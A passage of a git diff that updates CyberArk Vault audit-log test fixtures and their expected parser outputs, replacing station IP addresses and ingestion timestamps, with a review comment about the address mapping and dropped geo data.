06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"34.71.250.247\"}}}", + "ingested": "2021-12-09T13:37:11.641168500Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n 
\u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "8", "kind": "event", "action": "logoff", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log index 308e66ee8c0..0c85cdc8b95 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log 
@@ -3,16 +3,16 @@ Mar 08 02:54:46 VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PVWAGWUser","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:19Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:19","IsoTimestamp":"2021-03-10T08:29:19Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"Prov_COMPONENTS","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} <5>1 2021-03-10T08:29:28Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:29:28","IsoTimestamp":"2021-03-10T08:29:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PasswordManager","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n 
\n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 81.32.170.205\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 34.66.114.180\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.66.114.180","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} -<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n 
PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 34.71.250.247\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:52Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:52","IsoTimestamp":"2021-03-10T09:11:52Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T09:11:55Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
01:11:55","IsoTimestamp":"2021-03-10T09:11:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_localhost.localdomain","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set 
Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMGw_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:54\n 2021-03-11T16:59:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:54","IsoTimestamp":"2021-03-11T16:59:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T16:59:55Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:55\n 2021-03-11T16:59:55Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_VAGRANT\n Set Password\n \n \n \n \n 67.43.156.13\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
08:59:55","IsoTimestamp":"2021-03-11T16:59:55Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_VAGRANT","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-11T20:10:33Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:10:33\n 2021-03-11T20:10:33Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMApp_ASR-WIN\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:10:33","IsoTimestamp":"2021-03-11T20:10:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPGW_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPGW_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set 
Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMPApp_SSH\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} +<5>1 2021-03-14T12:57:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:25\n 2021-03-14T12:57:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 88\n Set Password\n Info\n PSMP_ADB_asr-cyberark-psm-ssh\n Set Password\n \n \n \n \n 67.43.156.15\n \n \n \n \n \n Set Password\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:25","IsoTimestamp":"2021-03-14T12:57:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"88","Desc":"Set Password","Severity":"Info","Issuer":"PSMP_ADB_asr-cyberark-psm-ssh","Action":"Set Password","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Set Password","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json index 804117f7541..9d7c7ab2acd 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json 
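Review bot: The substitution collapses two previously distinct stations into one address: 34.66.114.180 (the PSMApp_ASR-WIN event on 2021-03-11) and 34.71.250.247 (the three PSMP*_SSH events on 2021-03-14) both become 67.43.156.15, while 81.32.170.205 and 35.192.121.42 keep separate identities as .13 and .14. That changes the related.ip cardinality of the fixture and makes the SSH and Windows PSM components look like one host; harmless for the parser assertions, but if the 1:1 mapping was intended, a fourth address from the same supported block should be used for the SSH events. Since a syslog fixture cannot carry a comment, record the old-to-new address mapping in the PR description or changelog entry so the Station values stay traceable to the original capture. The regenerated expected output for this file also drops the source.geo block for these events instead of replacing it with a result for 67.43.156.13; if the supported subset is meant to give deterministic GeoIP lookups, that suggests the expectations were regenerated without the GeoIP database and the geoip enrichment is no longer exercised by this test.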
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json @@ -47,7 +47,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212139100Z", + "ingested": "2021-12-09T13:37:13.320124300Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -100,7 +100,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212147900Z", + "ingested": "2021-12-09T13:37:13.320131800Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" 
@@ -143,7 +143,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212149500Z", + "ingested": "2021-12-09T13:37:13.320135400Z", "original": "Mar 08 02:54:46 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -199,7 +199,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212150900Z", + "ingested": "2021-12-09T13:37:13.320140200Z", "original": "\u003c5\u003e1 2021-03-10T08:29:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:19\",\"IsoTimestamp\":\"2021-03-10T08:29:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" 
